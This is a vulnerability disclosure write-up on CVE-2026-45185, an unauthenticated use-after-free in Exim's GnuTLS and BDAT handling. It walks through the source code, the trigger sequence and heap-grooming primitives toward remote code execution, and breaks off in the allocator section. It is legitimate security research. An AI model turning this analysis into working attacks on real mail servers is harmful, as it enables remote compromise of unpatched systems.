Dead.Letter (CVE-2026-45185): How XBOW Found an Unauthenticated RCE on Exim

XBOW discovered CVE-2026-45185, a critical unauthenticated RCE in Exim, and used the disclosure window to test how far human and autonomous exploit development could go.

CVE-2026-45185

Dear reader,

What follows is, before anything else, a story. One of those old, well-worn ones. A story of encounters and misencounters, of broken hearts and quiet betrayals, of loves once thought to be forever turning out to be something else entirely. Told, this time, in a setting where stories of that shape are not usually told.

These pages are the by-product of the early days of testing a product we are building: a product focused on finding and detecting vulnerabilities in native code. So what you are about to read is two things at once. It is the technical account of a vulnerability of worldwide reach that we found and reported, and it is also, more quietly, the account of how I tried to make peace with the new shape of the world we are now living in.

I have spent almost ten years writing exploits professionally, and twenty in security altogether. In recent years large language models have arrived to shift the paradigm, and until now I had kept myself on the sidelines whenever it came to using them for writing exploits. This is the first time I have stepped off those sidelines and let one of these models into the place where, until now, only my own hands had ever been. Furthermore, in my entire career I had never read a single line of Exim's source. I vaguely remembered a Qualys write-up (https://www.qualys.com/2021/05/04/21nails/21nails.txt) from years ago that had blown my mind at the time, but I had never sat down with the code itself.

I hope what follows finds two kinds of readers: the ones who came for the technical depth, and the ones who came for the story. I would be glad if it found both at once.

The vulnerability

The bug is a use-after-free triggered when a TLS connection is handled by GnuTLS (the default TLS library on many Debian-based distributions, including Ubuntu). During TLS shutdown, Exim frees its TLS transfer buffer — but a nested BDAT receive wrapper can still process incoming bytes and end up calling ungetc(), which writes a single character (\n) into the freed region. That one-byte write lands on Exim's allocator metadata, corrupting the allocator's internal shape; the exploit then leverages that corruption to gain further primitives.

What matters here is that triggering this bug requires almost no special configuration on the server. That, more than the technical shape of the corruption itself, is what makes it one of the highest-caliber bugs discovered in Exim to date. The write primitive might seem deceptively weak at first glance: it puts a single newline character into a freed memory region. But as the rest of this post will show, that one byte is enough to escalate all the way to remote code execution. What follows is a walk through the technical details of how Exim works, and where the bug lives inside that machinery.

If you came only for the story, feel free to jump ahead to "Setting the challenge".

Note: all code in this post is taken from Exim 4.97 as shipped in default installations of Debian-based distributions, including Ubuntu 24.04 LTS.

Exim Basics

When a client issues STARTTLS over a plaintext SMTP session, Exim's command dispatcher runs the following handler:

#File: src/smtp_in.c

int smtp_setup_msg(void)

{

// ...

switch (smtp_read_command(...))

{

// ...

case STARTTLS_CMD:

HAD(SCH_STARTTLS);

if (!fl.tls_advertised)

{

done = synprot_error(L_smtp_protocol_error, 503, NULL,

US"STARTTLS command used when not advertised");

break;

}

/* Apply an ACL check if one is defined */

if ( acl_smtp_starttls

&& (rc = acl_check(ACL_WHERE_STARTTLS, NULL, acl_smtp_starttls,

&user_msg, &log_msg)) != OK)

{

done = smtp_handle_acl_fail(ACL_WHERE_STARTTLS, rc, user_msg, log_msg);

break;

}

// ...

s = NULL;

if ((rc = tls_server_start(&s)) == OK) //[1]

{

// ...

DEBUG(D_tls) debug_printf("TLS active\n");

break; /* Successful STARTTLS */

}

// ...

}

// ...

}

[1] calls tls_server_start(), which in turn calls tls_init(). tls_init() then allocates a fresh GnuTLS server session:

#File: src/tls-gnu.c

static int

tls_init(

const host_item *host,

smtp_transport_options_block * ob,

const uschar * require_ciphers,

exim_gnutls_state_st **caller_state,

tls_support * tlsp,

uschar ** errstr)

{

//...

state = &state_server;

state->tlsp = tlsp;

DEBUG(D_tls) debug_printf("initialising GnuTLS server session\n");

rc = gnutls_init(&state->session, GNUTLS_SERVER);

//...

}

state->session is a gnutls_session_t, the GnuTLS handle that owns every piece of cryptographic state for this TLS connection: the negotiated cipher suite, the record-layer keys, the read and write sequence numbers, the ALPN selection, and so on. Most importantly for us, it also holds the transport callbacks that bridge GnuTLS to Exim. Every subsequent TLS operation Exim performs goes through it, so the session acts as the object that carries the TLS state and is passed as an argument to each operation. For example:

#File: src/tls-gnu.c

rc = gnutls_handshake(state->session);

//...

inbytes = gnutls_record_recv(state->session, state->xfer_buffer, ...);

//...

outbytes = gnutls_record_send(state->session, buff, left);

//...

gnutls_bye(state->session, GNUTLS_SHUT_WR);

//...

gnutls_deinit(state->session);

Back in tls_server_start(), once the session exists, Exim configures certificate verification, registers the SNI post-client-hello callback, replies "220 TLS go ahead", wires the GnuTLS transport layer into the SMTP input and output file descriptors, and finally runs the handshake.

#File: src/tls-gnu.c

int

tls_server_start(uschar ** errstr)

{

int rc;

exim_gnutls_state_st * state = NULL;

// ... already-active check, tls_init() call, ALPN/resume setup ...

if (verify_check_host(&tls_verify_hosts) == OK)

{

state->verify_requirement = VERIFY_REQUIRED;

gnutls_certificate_server_set_request(state->session, GNUTLS_CERT_REQUIRE);

}

// ...

gnutls_handshake_set_post_client_hello_function(state->session,

exim_sni_handling_cb);

if (!state->tlsp->on_connect)

{

smtp_printf("220 TLS go ahead\r\n", FALSE);

fflush(smtp_out);

}

gnutls_transport_set_ptr2(state->session,

(gnutls_transport_ptr_t)(long) fileno(smtp_in),

(gnutls_transport_ptr_t)(long) fileno(smtp_out));

state->fd_in = fileno(smtp_in);

state->fd_out = fileno(smtp_out); //...

}

After the handshake succeeds, Exim allocates the transfer buffer with store_malloc() and replaces the SMTP receive functions with TLS wrapper functions. These wrappers shield callers of the receive_* functions from the underlying connection type.

#File: src/tls-gnu.c

int

tls_server_start(uschar ** errstr)

{

//...

state->xfer_buffer = store_malloc(ssl_xfer_buffer_size);

receive_getc = tls_getc;

receive_getbuf = tls_getbuf;

receive_get_cache = tls_get_cache;

receive_hasc = tls_hasc;

receive_ungetc = tls_ungetc;

receive_feof = tls_feof;

receive_ferror = tls_ferror;

return OK;

}

xfer_buffer is a 4096-byte plaintext area. Whenever the parser calls tls_getc() and the buffer is empty, tls_refill() decrypts a record into it. Bytes are then consumed one at a time by advancing the low-water mark, xfer_buffer_lwm. The detail worth keeping in mind is that this buffer comes straight from store_malloc(), which wraps internal_store_malloc(), which in turn wraps malloc(). In other words, it is a plain glibc heap chunk rather than pool memory.

#File: src/store.c

void * store_malloc_3(size_t size, const char * func, int linenumber)

{

if (n_nonpool_blocks++ > max_nonpool_blocks)

max_nonpool_blocks = n_nonpool_blocks;

return internal_store_malloc(size, func, linenumber); //[1]

}

Once tls_server_start() returns, the entire SMTP I/O path goes through the TLS-aware callbacks it installed. Exim doesn't call tls_getc() directly. Instead, it calls the indirect function pointers we saw above (receive_getc, receive_getbuf, etc.).
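The following sketch makes the indirection concrete by reducing it to a single getc slot. Everything in it is a hypothetical illustration, not Exim code: plain_getc, tls_getc_stub, install_tls_callbacks and next_input_byte. The only point it shows is that callers go through the pointer and never name the transport.

```c
#include <assert.h>

/* Hypothetical one-slot model of the receive_* row: only getc is modelled. */
typedef int (*getc_fn)(unsigned lim);

static int plain_getc(unsigned lim)    { (void)lim; return 'P'; }  /* stands in for smtp_getc */
static int tls_getc_stub(unsigned lim) { (void)lim; return 'T'; }  /* stands in for tls_getc */

static getc_fn receive_getc_slot = plain_getc;   /* plaintext session default */

/* The last step of tls_server_start(), reduced to one assignment. */
static void install_tls_callbacks(void) { receive_getc_slot = tls_getc_stub; }

/* Callers never name a transport; they only call through the pointer. */
static int next_input_byte(void) { return receive_getc_slot(4096); }
```

Because the caller cannot tell which transport it is talking to, the last writer of the slot decides which function runs.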

BDAT Chunking

BDAT (RFC 3030 CHUNKING) is the part of the SMTP grammar where a client says "the next N octets on the wire are body bytes; do not interpret them as SMTP commands." DATA delivers the body as a CRLF-terminated stream that ends with a line containing a single ".". BDAT N [LAST] instead declares the size up front, and the receiver simply reads N bytes verbatim.
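For readers less familiar with CHUNKING, the client side of a single BDAT chunk can be sketched as follows. build_bdat() is a hypothetical helper written for this post. It frames an arbitrary body as "BDAT <n>[ LAST]\r\n" followed by exactly n raw octets, with no dot-stuffing and no terminator.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: frame n body octets as one BDAT chunk.
   Returns the number of bytes written to out, or -1 if out is too small. */
static int build_bdat(char *out, size_t cap, const char *body, size_t n, int last)
{
  int hdr = snprintf(out, cap, "BDAT %zu%s\r\n", n, last ? " LAST" : "");
  if (hdr < 0 || (size_t)hdr >= cap || (size_t)hdr + n > cap)
    return -1;                  /* header truncated or body does not fit */
  memcpy(out + hdr, body, n);   /* raw octets: no dot-stuffing, no terminator */
  return hdr + (int)n;
}
```

The server reads exactly n octets, so nothing forces the body to end with CRLF. A chunk that stops mid-line is perfectly legal on the wire.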

For Exim's parser this poses a small implementation challenge. The parser is a state machine driven by indirect function pointers: receive_getc, receive_getbuf, receive_hasc, receive_ungetc. As we explained before, in a plaintext session that row points at the smtp_* functions. After a successful STARTTLS, the entire row is rewritten to point at tls_*. But BDAT is a modal operation: it does not replace the underlying transport. It composes on top of it for a bounded number of bytes and then steps out of the way.

To handle this, Exim keeps a second row of the same shape, lwr_receive_*. When a BDAT chunk begins, bdat_push_receive_functions() copies the current top row down into the lower row and overwrites the top row with the BDAT wrappers:

#File: src/smtp_in.c

static inline void

bdat_push_receive_functions(void)

{

/* push the current receive_* function on the "stack", and

replace them by bdat_getc(), which in turn will use the lwr_receive_*

functions to do the dirty work. */

if (!lwr_receive_getc)

{

lwr_receive_getc = receive_getc;

lwr_receive_getbuf = receive_getbuf;

lwr_receive_hasc = receive_hasc;

lwr_receive_ungetc = receive_ungetc;

}

else

{

DEBUG(D_receive) debug_printf("chunking double-push receive functions\n");

}

receive_getc = bdat_getc;

receive_getbuf = bdat_getbuf;

receive_hasc = bdat_hasc;

receive_ungetc = bdat_ungetc;

}

The BDAT wrappers themselves do not parse SMTP commands. Instead, they defer all actual I/O to the lower layer they just saved:

int bdat_getc(unsigned lim)

{

// ...

for (;;)

{

if (chunking_data_left > 0)

return lwr_receive_getc(chunking_data_left--);

bdat_pop_receive_functions();

}

}

uschar * bdat_getbuf(unsigned * len)

{

uschar * buf;

if (chunking_data_left == 0)

{ *len = 0; return NULL; }

if (*len > chunking_data_left) *len = chunking_data_left;

buf = lwr_receive_getbuf(len); /* Either smtp_getbuf or tls_getbuf */

chunking_data_left -= *len;

return buf;

}

int

bdat_ungetc(int ch)

{

chunking_data_left++;

bdat_push_receive_functions(); /* we're not done yet, calling push is safe, because it checks the state before pushing anything */

return lwr_receive_ungetc(ch);

}

So while BDAT is active, every body byte the message reader pulls follows this path:

bdat_getc → lwr_receive_getc (here tls_getc) → gnutls_record_recv → xfer_buffer

When the chunk is consumed, BDAT is supposed to unstack itself via bdat_pop_receive_functions(), which copies the lower row back up to the top and clears the lower row to NULL:

#File: src/smtp_in.c

static inline void

bdat_pop_receive_functions(void)

{

if (!lwr_receive_getc)

{

DEBUG(D_receive) debug_printf("chunking double-pop receive functions\n");

return;

}

receive_getc = lwr_receive_getc;

receive_getbuf = lwr_receive_getbuf;

receive_hasc = lwr_receive_hasc;

receive_ungetc = lwr_receive_ungetc;

lwr_receive_getc = NULL;

lwr_receive_getbuf = NULL;

lwr_receive_hasc = NULL;

lwr_receive_ungetc = NULL;

}

The lower row is owned by BDAT, so once bdat_push_receive_functions() has put tls_* (or smtp_*) into lwr_receive_*, only bdat_pop_receive_functions() is supposed to take it back out. No other code path in Exim reads or writes the lower row.
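In practice, the push/pop discipline is a one-slot stack that uses NULL as its "empty" sentinel. The sketch below models only the getc column. push(), pop(), top_getc and lwr_getc are hypothetical names that mirror bdat_push_receive_functions(), bdat_pop_receive_functions(), receive_getc and lwr_receive_getc.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*getc_fn)(unsigned lim);

static int tls_getc_m(unsigned lim)  { (void)lim; return 't'; }  /* stands in for tls_getc */
static int bdat_getc_m(unsigned lim) { (void)lim; return 'b'; }  /* stands in for bdat_getc */

static getc_fn top_getc = tls_getc_m;   /* receive_getc after STARTTLS */
static getc_fn lwr_getc = NULL;         /* lwr_receive_getc, empty */

static void push(void)
{
  if (!lwr_getc)            /* save only once: a double push keeps the saved entry */
    lwr_getc = top_getc;
  top_getc = bdat_getc_m;
}

static void pop(void)
{
  if (!lwr_getc)            /* double pop: nothing to restore */
    return;
  top_getc = lwr_getc;
  lwr_getc = NULL;
}
```

Note the asymmetry: only pop() clears the lower slot. Any other code that rewrites the top row without going through pop() leaves a stale entry behind in the lower one.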

Inside the TLS receive path: xfer_buffer and the low-water mark

Once we know BDAT is going to call into the saved tls_* callbacks, the next question is: what do those callbacks actually do? Two of them matter for the rest of this story, tls_getc() and tls_ungetc():

#File: src/tls-gnu.c

/*************************************************

* TLS version of getc *

*************************************************/

/* This gets the next byte from the TLS input buffer. If the buffer is empty,

it refills the buffer via the GnuTLS reading function.

Only used by the server-side TLS.

This feeds DKIM and should be used for all message-body reads.

Arguments: lim Maximum amount to read/buffer

Returns: the next character or EOF

*/

int

tls_getc(unsigned lim)

{

exim_gnutls_state_st * state = &state_server;

if (state->xfer_buffer_lwm >= state->xfer_buffer_hwm)

if (!tls_refill(lim))

return state->xfer_error ? EOF : smtp_getc(lim);

return state->xfer_buffer[state->xfer_buffer_lwm++];

}

/*************************************************

* TLS version of ungetc *

*************************************************/

/* Puts a character back in the input buffer. Only ever called once.

Only used by the server-side TLS.

Arguments:

ch the character

Returns: the character

*/

int tls_ungetc(int ch)

{

if (ssl_xfer_buffer_lwm <= 0)

log_write_die(0, LOG_MAIN, "buffer underflow in tls_ungetc");

ssl_xfer_buffer[--ssl_xfer_buffer_lwm] = ch;

return ch;

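}

Both functions operate on the same three pieces of state. tls_getc() reaches them as state->xfer_buffer*, and tls_ungetc() uses the ssl_xfer_buffer* names: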

- ssl_xfer_buffer — the 4096-byte transfer buffer that tls_server_start() allocated with store_malloc().

- ssl_xfer_buffer_lwm — the low-water mark, the index of the next byte to consume.

- ssl_xfer_buffer_hwm — the high-water mark, one past the last buffered byte.

The buffer is filled by tls_refill(), which calls gnutls_record_recv() to decrypt the next TLS record into xfer_buffer. After a refill, lwm is reset to 0 and hwm is set to the size of the decrypted record.

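All of this means that we can control ssl_xfer_buffer_lwm just by sending SMTP traffic. lwm is simply the number of bytes of the current record that the parser has consumed, so what we send, and how we split it into TLS records, decides where it stands at any given moment.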
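A stripped-down model of the buffer arithmetic may help here. refill_model(), getc_model() and ungetc_model() are hypothetical stand-ins for tls_refill(), tls_getc() and tls_ungetc(). No TLS is involved: a "refill" just copies bytes in. The point to take away is that ungetc writes at index lwm - 1, and lwm only counts how many bytes of the current record have been consumed.

```c
#include <assert.h>
#include <string.h>

#define XFER_SIZE 4096                 /* matches the 4096-byte xfer_buffer */

static unsigned char xfer[XFER_SIZE];  /* stand-in for ssl_xfer_buffer */
static int lwm = 0;                    /* next byte to consume */
static int hwm = 0;                    /* one past the last buffered byte */

/* Hypothetical tls_refill(): pretend one decrypted record arrived. */
static void refill_model(const char *record, size_t len)
{
  assert(len <= XFER_SIZE);
  memcpy(xfer, record, len);
  lwm = 0;
  hwm = (int)len;
}

/* Hypothetical tls_getc(): returns -1 when drained (no real refill here). */
static int getc_model(void)
{
  if (lwm >= hwm)
    return -1;
  return xfer[lwm++];
}

/* Hypothetical tls_ungetc(): same index arithmetic as the real one. */
static int ungetc_model(int ch)
{
  assert(lwm > 0);                     /* the real tls_ungetc() dies on underflow */
  xfer[--lwm] = (unsigned char)ch;
  return ch;
}
```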

The trigger

The free and the use both happen inside the call to read_message_bdat_smtp() from receive_msg(). read_message_bdat_smtp() is in charge of pulling the body bytes of a BDAT chunk. Once the BDAT body parser is running, it never returns to its caller until the chunk is fully consumed. That is the window where everything happens: the xfer_buffer is freed mid-loop, and the same loop, a few iterations later, writes through it.

#File: src/receive.c

/* Variant of the above read_message_data_smtp() specialised for RFC 3030

CHUNKING. Accept input lines separated by either CRLF or CR or LF and write

LF-delimited spoolfile. Until we have wireformat spoolfiles, we need the

body_linecount accounting for proper re-expansion for the wire, so use

a cut-down version of the state-machine above; we don't need to do leading-dot

detection and unstuffing.

Arguments:

fout a FILE to which to write the message; NULL if skipping;

must be open for both writing and reading.

Returns: One of the END_xxx values indicating why it stopped reading

*/

static int

read_message_bdat_smtp(FILE * fout)

{

int linelength = 0, ch;

enum CH_STATE ch_state = LF_SEEN;

BOOL fix_nl = FALSE;

for(;;)

{

switch ((ch = bdat_getc(GETC_BUFFER_UNLIMITED))) //[1]

{

case EOF: return END_EOF;

case ERR: return END_PROTOCOL;

case EOD:

// ...

if (linelength == -1) /* \r already seen */ {

bdat_ungetc('\n'); // THE USE: this is where the UAF write fires

continue; }

bdat_ungetc('\r'); // (the '\r' branch is the same primitive,

fix_nl = TRUE; // with a different byte value)

continue;

case '\0': body_zerocount++; break;

}

// ...

}

}

Each iteration of the loop calls bdat_getc ([1]). While there are body bytes left in the chunk, bdat_getc delegates the work to the saved lower layer:

#File: src/smtp_in.c

int

bdat_getc(unsigned lim)

{

// ...

for (;;) {

if (chunking_data_left > 0)

return lwr_receive_getc(chunking_data_left--);//[1]

}

}

In our case, [1] calls tls_getc:

#File: src/tls-gnu.c

int

tls_getc(unsigned lim)

{

exim_gnutls_state_st * state = &state_server;

if (state->xfer_buffer_lwm >= state->xfer_buffer_hwm) if (!tls_refill(lim)) //[2]

return state->xfer_error ? EOF : smtp_getc(lim);// cleartext fallback after close

return state->xfer_buffer[state->xfer_buffer_lwm++];

}

[2] calls tls_refill():

#File: src/tls-gnu.c

static BOOL tls_refill(unsigned lim)

{

exim_gnutls_state_st * state = &state_server;

ssize_t inbytes;

// ...

do

inbytes = gnutls_record_recv(state->session, state->xfer_buffer,

MIN(ssl_xfer_buffer_size, lim));

while (inbytes == GNUTLS_E_AGAIN);

// ...

if (sigalrm_seen){

//...

}

else if (inbytes == 0)

{

DEBUG(D_tls) debug_printf("Got TLS_EOF\n");

tls_close(NULL, TLS_NO_SHUTDOWN); //this frees state->xfer_buffer

return FALSE;

}

}

tls_close() is the actual free site:

#File: src/tls-gnu.c

void

tls_close(void * ct_ctx, int do_shutdown)

{

// ...

if (!ct_ctx) /* server */

{

receive_getc = smtp_getc; //[1]

receive_getbuf = smtp_getbuf;

receive_get_cache = smtp_get_cache;

receive_hasc = smtp_hasc;

receive_ungetc = smtp_ungetc;

receive_feof = smtp_feof;

receive_ferror = smtp_ferror;

} // [2]

gnutls_deinit(state->session);

if (state->xfer_buffer) store_free(state->xfer_buffer); //[3]

}

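The block at [1] unwraps the TLS connection: it points the top-level receive_* row back at the cleartext smtp_* functions, so the session continues in clear text. At [2], the lwr_receive_* row is NOT touched. [3] releases xfer_buffer with store_free(), which ends up in glibc's free().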

Two things to register here, because the rest of the bug rides on them:

1. tls_close() only restores the top-level receive_* callbacks back to smtp_*. It does not touch the lwr_receive_* row that BDAT had populated with tls_* when the chunk started. So lwr_receive_ungetc is still tls_ungetc, ready to fire.

2. state->xfer_buffer is freed but never set to NULL. Its pointer value still resolves to the just-released chunk.
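The two observations above can be condensed into a small model. Nothing is actually freed here. xfer_live is a hypothetical flag that stands in for the lifetime of state->xfer_buffer, and every *_m function is an illustrative stand-in, not Exim code. The model shows the ordering: after tls_close_m(), a call to bdat_ungetc_m() still reaches tls_ungetc_m() through the lower row that nobody reset.

```c
#include <assert.h>
#include <stdbool.h>

typedef int (*ungetc_fn)(int ch);

static bool xfer_live = true;       /* hypothetical: "state->xfer_buffer is allocated" */
static bool stale_write = false;    /* set when the TLS ungetc runs on a dead buffer */

static int smtp_ungetc_m(int ch) { return ch; }

static int tls_ungetc_m(int ch)
{
  if (!xfer_live)
    stale_write = true;             /* the real tls_ungetc() writes ch into the freed chunk here */
  return ch;
}

/* Lower row, as saved by bdat_push_receive_functions() after STARTTLS. */
static ungetc_fn lwr_receive_ungetc_m = tls_ungetc_m;

static int bdat_ungetc_m(int ch);
static ungetc_fn receive_ungetc_m = bdat_ungetc_m;   /* top row while BDAT is active */

static int bdat_ungetc_m(int ch)
{
  receive_ungetc_m = bdat_ungetc_m; /* re-push: touches the top row only */
  return lwr_receive_ungetc_m(ch);  /* delegates to whatever the lower row holds */
}

/* Only the parts of tls_close() that matter here. */
static void tls_close_m(void)
{
  receive_ungetc_m = smtp_ungetc_m; /* [1] top row back to cleartext */
                                    /* [2] lower row deliberately untouched */
  xfer_live = false;                /* [3] buffer released, pointer not cleared */
}
```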

Reaching the use

Eventually bdat_getc returns EOD. Control comes back to the EOD case at the top of read_message_bdat_smtp, and the missing-CRLF repair fires:

case EOD:

// ...

if (linelength == -1)

{

bdat_ungetc('\n');

continue;

}

And, as we saw before, tls_ungetc writes through state_server.xfer_buffer, which still holds the freed pointer:

#File: src/tls.c

/*************************************************

* TLS version of ungetc *

*************************************************/

/* Puts a character back in the input buffer. Only ever

called once.

Only used by the server-side TLS.

Arguments:

ch the character

Returns: the character

*/

int

tls_ungetc(int ch)

{

if (ssl_xfer_buffer_lwm <= 0)

log_write_die(0, LOG_MAIN, "buffer underflow in tls_ungetc");

ssl_xfer_buffer[--ssl_xfer_buffer_lwm] = ch; //[1]

return ch;

}

[1] writes one byte (\n or \r) at xfer_buffer[lwm - 1], inside the chunk that tls_close() has already freed.

There is one more thing worth pointing at in this same window between the free and the use. After tls_refill returns FALSE, control bounces back up to tls_getc, which falls back to smtp_getc(lim) to read the rest of the body in cleartext. The loop in read_message_bdat_smtp does not notice that anything has changed. It keeps running, now pulling bytes from the cleartext tail of the connection instead of from the (now-dead) TLS layer. And every cleartext refill goes through smtp_refill, which feeds DKIM:

#File: src/smtp_in.c

/* Refill the buffer, and notify DKIM verification code.

Return false for error or EOF.

*/

static BOOL smtp_refill(unsigned lim)

{

//...

#ifndef DISABLE_DKIM

dkim_exim_verify_feed(smtp_inbuffer, rc);

#endif

//...

return TRUE;

}

dkim_exim_verify_feed() does two things that matter:

#File: src/dkim.c

/* Submit a chunk of data for verification input.

Only use the data when the feed is activated. */

void

dkim_exim_verify_feed(uschar * data, int len)

{

int rc;

store_pool = POOL_MESSAGE; // [1]

if ( dkim_collect_input

&& (rc = pdkim_feed(dkim_verify_ctx, data, len)) != PDKIM_OK)

{

//...

}

store_pool = dkim_verify_oldpool; // [2]

}

[1] and [2] scope the pool switch. While DKIM runs, pool allocations go to POOL_MESSAGE, and afterwards the pool is set back to dkim_verify_oldpool. We will look at how Exim's custom allocator works later, including how pools grow. In short, every store_get() performed inside pdkim_feed() and below is served from POOL_MESSAGE. So in the gap between the free and the use, two different pools can receive allocations: POOL_MESSAGE while DKIM is hashing each line, and POOL_MAIN for everything else.

Once the body bytes are routed through pdkim_feed(), relaxed body canonicalization triggers a nonpool allocation:

#File: src/pdkim/pdkim.c

static blob *

pdkim_update_ctx_bodyhash(pdkim_bodyhash * b, const blob * orig_data, blob * relaxed_data)

{

const blob * canon_data = orig_data;

// ...

if (b->canon_method == PDKIM_CANON_RELAXED)

{

if (!relaxed_data)

{

// ...

relaxed_data = store_malloc(sizeof(blob) + orig_data->len + 1);// [1]

relaxed_data->data = US (relaxed_data + 1);

for (const uschar * p = orig_data->data, * r = p + orig_data->len; p < r; p++)

{

char c = *p;

// ...

relaxed_data->data[q++] = c; // [2]

}

relaxed_data->data[q] = '\0';

relaxed_data->len = q;

}

canon_data = relaxed_data;

}

// ...

return relaxed_data;

}

[1] is a nonpool (store_malloc()) allocation whose size we control through the line length, and [2] copies the line bytes into the freshly allocated chunk. Unfortunately for us, this allocation is temporary and is freed almost immediately:

static void

pdkim_bodyline_complete(pdkim_ctx * ctx)

{

blob line = {.data = ctx->linebuf, .len = ctx->linebuf_offset};

blob * rnl = NULL;

blob * rline = NULL;

// ...

for (pdkim_bodyhash * b = ctx->bodyhash; b; b = b->next)

{

//...

while (b->num_buffered_blanklines)

{

rnl = pdkim_update_ctx_bodyhash(b, &lineending, rnl);//[A]

b->num_buffered_blanklines--;

}

rline = pdkim_update_ctx_bodyhash(b, &line, rline); // [B]

//...

}

if (rnl) store_free(rnl); // [C]

if (rline) store_free(rline); // [D]

// ...

}

[C] and [D] free the buffers allocated at [A] and [B]. These buffers are temporary, but glibc's free() does not clear the chunk: only the first few bytes are overwritten by free-list linkage. So the primitive can still reclaim a freed chunk and leave it populated with our own controlled bytes, which survive the free almost intact.
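The size of this temporary chunk is what makes it useful for grooming, so it helps to predict which glibc chunk size a given line length produces. This sketch rests on several assumptions. It targets an x86_64 glibc (8-byte size field, 16-byte alignment, 32-byte minimum chunk). blob_model is a hypothetical struct with the same pointer-plus-length shape as blob. It also assumes store_malloc() passes the size to malloc() unchanged. If the wrapper adds a header of its own, add that to the request.

```c
#include <assert.h>
#include <stddef.h>

/* Assumptions: x86_64 glibc (8-byte size field, 16-byte alignment,
   32-byte minimum chunk) and store_malloc() passing the size through unchanged. */
#define SIZE_SZ    ((size_t)8)
#define ALIGN_MASK ((size_t)15)
#define MINSIZE    ((size_t)32)

/* Hypothetical stand-in with the same pointer-plus-length shape as blob. */
typedef struct { unsigned char *data; size_t len; } blob_model;

/* Bytes requested at [1] in pdkim_update_ctx_bodyhash() for a line of line_len bytes. */
static size_t relaxed_request(size_t line_len)
{
  return sizeof(blob_model) + line_len + 1;
}

/* Same result as glibc's request2size(): add the size field, round up to 16,
   enforce the minimum chunk size. */
static size_t glibc_chunk_size(size_t req)
{
  size_t sz = (req + SIZE_SZ + ALIGN_MASK) & ~ALIGN_MASK;
  return sz < MINSIZE ? MINSIZE : sz;
}
```

The request is computed from orig_data->len, so the chunk size depends on the raw line length, no matter how much relaxed canonicalization shrinks the copied data.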

Exim custom memory allocator

Before going any further, it is worth pausing on Exim's custom memory allocator, the store subsystem. The shape of the bug only becomes legible once that piece is in place. Several earlier write-ups cover this ground in detail and are well worth reading, including https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/.

Exim does not allocate every short-lived object with plain malloc. Most temporary data goes through a hand-rolled pool allocator the codebase calls store. The rationale, per the comment at the top of src/store.c, is that short-lived processes do not need a real free, and a set of pools makes it cheap to "rewind" memory in bulk after a transaction completes.

The set of pools is fixed and lives in an enum in src/store.h:

#File: src/store.h

enum { POOL_MAIN,

POOL_PERM,

POOL_CONFIG,

POOL_SEARCH,

POOL_MESSAGE,

POOL_TAINT_BASE,

POOL_TAINT_MAIN = POOL_TAINT_BASE,

POOL_TAINT_PERM,

POOL_TAINT_CONFIG,

POOL_TAINT_SEARCH,

POOL_TAINT_MESSAGE,

N_PAIRED_POOLS

};
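This paired layout is what makes taint handling cheap: every ordinary pool has a tainted twin exactly POOL_TAINT_BASE entries further on. The sketch below shows the rule. select_pool() is a hypothetical helper that expresses the "add POOL_TAINT_BASE for tainted data" rule described later in this post. It is not Exim's actual selection code.

```c
#include <assert.h>
#include <stdbool.h>

/* Same layout as the enum in src/store.h shown above. */
enum { POOL_MAIN,
       POOL_PERM,
       POOL_CONFIG,
       POOL_SEARCH,
       POOL_MESSAGE,
       POOL_TAINT_BASE,
       POOL_TAINT_MAIN = POOL_TAINT_BASE,
       POOL_TAINT_PERM,
       POOL_TAINT_CONFIG,
       POOL_TAINT_SEARCH,
       POOL_TAINT_MESSAGE,
       N_PAIRED_POOLS };

/* Hypothetical helper: tainted data goes to the twin of the requested pool. */
static int select_pool(int pool, bool tainted)
{
  return tainted ? pool + POOL_TAINT_BASE : pool;
}
```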

A pool is implemented as a linked list of memory chunks obtained from internal_store_malloc() and managed as a bump allocator. Each element in that linked list is a storeblock:

#File: src/store.c

typedef struct storeblock {

struct storeblock *next;

size_t length;

} storeblock;

On a 64-bit build the header occupies 16 bytes. Each block begins with a next pointer at +0x0, followed by a length field at +0x8, and user allocations start at +0x10.
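These offsets can be checked mechanically. The sketch below copies the storeblock definition and asserts its layout on an LP64 target. block_data() is a hypothetical helper. It assumes the header is rounded up to 16 bytes, which we take to match ALIGNED_SIZEOF_STOREBLOCK on 64-bit builds.

```c
#include <assert.h>
#include <stddef.h>

/* Copy of the storeblock definition shown above. */
typedef struct storeblock {
  struct storeblock *next;   /* +0x0 */
  size_t length;             /* +0x8 */
} storeblock;

/* Hypothetical helper: first user byte of a block, assuming the header is
   rounded up to 16 bytes (our assumption for ALIGNED_SIZEOF_STOREBLOCK). */
static unsigned char *block_data(storeblock *b)
{
  size_t hdr = (sizeof(storeblock) + 15) & ~(size_t)15;
  return (unsigned char *)b + hdr;
}
```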

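Each pool is described by a single struct, the pooldesc, and there is exactly one of these for every pool. The descriptors are not carved out of the pools themselves. They sit in the paired_pools array, indexed as paired_pools + pool in the reset code below.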

typedef struct pooldesc {

storeblock * chainbase; /* list of blocks in pool */

storeblock * current_block; /* top block, still with free space */

void * next_yield; /* next allocation point */

int yield_length; /* remaining space in current block */

unsigned store_block_order; /* log2(size) block allocation size */

// ...

} pooldesc;

chainbase points at the first storeblock the pool created. It is set exactly once, at the moment the pool gets its first block, and is never overwritten while the pool is alive.

current_block points at the storeblock where the bump cursor currently lives, that is the block that the next store_get will be served from.

The bump cursor only moves forward inside a storeblock, and pool_get only ever appends new blocks at the tail — each one twice the size of the previous one (the first is 4 KiB, then 8 KiB, 16 KiB, and so on). The memory does not come back at the per-allocation level, there is no per-object free, and any leftover bytes at the tail of a block before pool_get decides to grow are simply abandoned (the classic internal-fragmentation cost). The only way memory is ever released back to a pool is by rewinding the bump cursor, and to do that, the caller has to leave a mark first.

A mark behaves much like a bookmark in a book. The caller calls store_mark() at a point it wants to be able to return to, the function performs a small 8-byte allocation in the current storeblock used at that moment, and the address of that 8-byte slot becomes the cookie the caller saves for later. There is nothing automatic about marks, they exist only where a caller has explicitly asked for one, and most allocations in Exim live and die without ever having a mark anywhere near them.
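A toy version of the bump-and-mark idea fits in a few lines. toy_pool, toy_get(), toy_mark() and toy_reset() are hypothetical and deliberately simplified: a single fixed buffer, no block chaining, no growth, and 8-byte alignment. They only illustrate the bookmark semantics. The block handling that store_reset() performs, described below, is left out.

```c
#include <assert.h>
#include <stddef.h>

/* Toy pool: one fixed buffer, no chaining, no growth. */
typedef struct {
  unsigned char buf[256];
  size_t next;                         /* bump cursor, like next_yield */
} toy_pool;

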